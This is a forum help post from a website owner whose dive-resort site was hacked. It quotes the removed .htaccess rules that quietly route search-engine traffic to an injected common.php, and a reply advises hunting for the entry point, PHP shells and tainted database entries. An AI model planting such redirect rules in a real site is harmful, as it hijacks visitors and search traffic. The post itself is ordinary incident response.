可能重复:
我的服务器被黑了 紧急求助
我的网站最近被黑客入侵了。我想我已经找到了添加到 htaccess 文件的代码,删除了它,然后添加了脚本以防止再次访问 htaccess 文件。我还删除了被黑代码引用的 php 文件 (common.php)。接下来我需要做什么?我不是程序员或网站开发人员,但我真的想看看我是否可以自己解决这个问题,因为我花了好几个小时尝试并且不会轻易放弃。
这是我删除的被黑代码:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$ /common.php [L]
</IfModule>
此代码必须保留在 htaccess 文件中,因为它将我的 url 重定向到 seo 友好的网站或网站错误,但此代码是否也被黑客入侵了?
# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
# <core_modules__alias>
RewriteRule ^about-us$ /index.php?page=883 [L,NC]
RewriteRule ^ausfluge-und-aktivitaten$ /index.php?page=800 [L,NC]
RewriteRule ^bluestardive-news$ /index.php?page=919 [L,NC]
RewriteRule ^bookings$ /index.php?page=911 [L,NC]
RewriteRule ^diveresort$ /index.php?page=879 [L,NC]
RewriteRule ^diving$ /index.php?page=880 [L,NC]
RewriteRule ^excursions-and-activities$ /index.php?page=881 [L,NC]
RewriteRule ^galerie$ /index.php?section=gallery [L,NC]
RewriteRule ^oceannight$ http://www.bluestardive.com/index.php?page=906 [L,NC]
RewriteRule ^philosophy$ /index.php?page=846 [L,NC]
RewriteRule ^reservation$ /index.php?page=917 [L,NC]
RewriteRule ^reservierung$ /index.php?page=918 [L,NC]
RewriteRule ^resort$ /index.php?page=798 [L,NC]
# </core_modules__alias>
# </contrexx>
答案1
在这种情况下,最好的办法是查明用户入口点并重复攻击 - 我无法告诉您是否在 .htaccess 中添加了任何可疑内容,因为我不知道 index.php 里面有什么。
如果 index.php 直接从数据库回显数据,那么他/她可能在数据库中添加了恶意代码,他/她可能在其他文件中创建了一些新的入口点(PHP Shell、漏洞)。
我强烈建议您与安全专家联系 - 如果没有,请彻底重新检查服务器上的每个文件,包括数据库条目。
确保弄清楚他的入口点是什么,以防止将来的攻击 - 如果您需要任何进一步的信息,您可以随时联系我。